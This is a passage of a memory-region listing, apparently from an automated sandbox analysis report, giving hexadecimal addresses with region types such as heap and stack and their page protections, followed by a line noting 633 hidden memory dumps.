page read and write
|
||
|
8620000
|
heap
|
page read and write
|
||
|
1E6D5067000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
1E6D31DB000
|
heap
|
page read and write
|
||
|
1E38E780000
|
heap
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
26F478F5000
|
heap
|
page read and write
|
||
|
1E6D5163000
|
heap
|
page read and write
|
||
|
3363000
|
heap
|
page read and write
|
||
|
5C81000
|
trusted library allocation
|
page read and write
|
||
|
26F2F897000
|
heap
|
page execute and read and write
|
||
|
4DC8000
|
trusted library allocation
|
page read and write
|
||
|
32DE000
|
heap
|
page read and write
|
||
|
1E6D31DF000
|
heap
|
page read and write
|
||
|
1E6D5064000
|
heap
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
20F44000
|
direct allocation
|
page read and write
|
||
|
8B9E000
|
stack
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
There are 633 hidden memdumps, click here to show them.